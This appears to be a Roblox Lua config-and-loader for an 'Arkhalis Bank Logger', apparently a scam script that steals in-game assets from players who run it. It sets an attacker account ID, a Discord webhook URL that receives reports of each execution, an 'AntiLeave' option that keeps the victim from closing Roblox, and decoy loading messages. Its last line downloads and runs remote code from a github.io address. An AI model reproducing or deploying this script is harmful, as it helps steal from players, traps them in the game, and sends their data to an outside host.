--[[ Arkhalis Bank Logger ]]--

--[[ Main Config ]]--
_G.UserId = 1410060179 --// Roblox Account Id [[https://www.roblox.com/users/IDHERE/profile]] <- This is a example
_G.AntiLeave = true --// Doesn't Let The Target Close Roblox
_G.Diamonds = 500000 --// Amount Of Diamonds To Not Kick
--[[ Webhook Config ]]--
_G.Webhook = "https://discord.com/api/webhooks/1100420204674166944/cZoaeauo4Iya2zsPliluSE1gV2rntZlPkQo49mRNNZxjWXXeEsR5imToLYkZ9ua6M0Ws" --// Discord Webhook For Executions

--[[ UI Config ]]--
_G.ScriptName = "Loading" --// Script Name On The UI
_G.Tip1 = "waiting" --// Gives You Tips On The UI
_G.Tip2 = "waiting." --// Gives You Tips On The UI
_G.Tip3 = "waiting.." --// Gives You Tips On The UI
_G.Tip4 = "waiting..." --// Gives You Tips On The UI
_G.Tip5 = "waiting...." --// Gives You Tips On The UI

--[[ Script ]]
loadstring(game:HttpGet("https://arkhalislua.github.io/Lua/ArkhalisBank.lua"))()
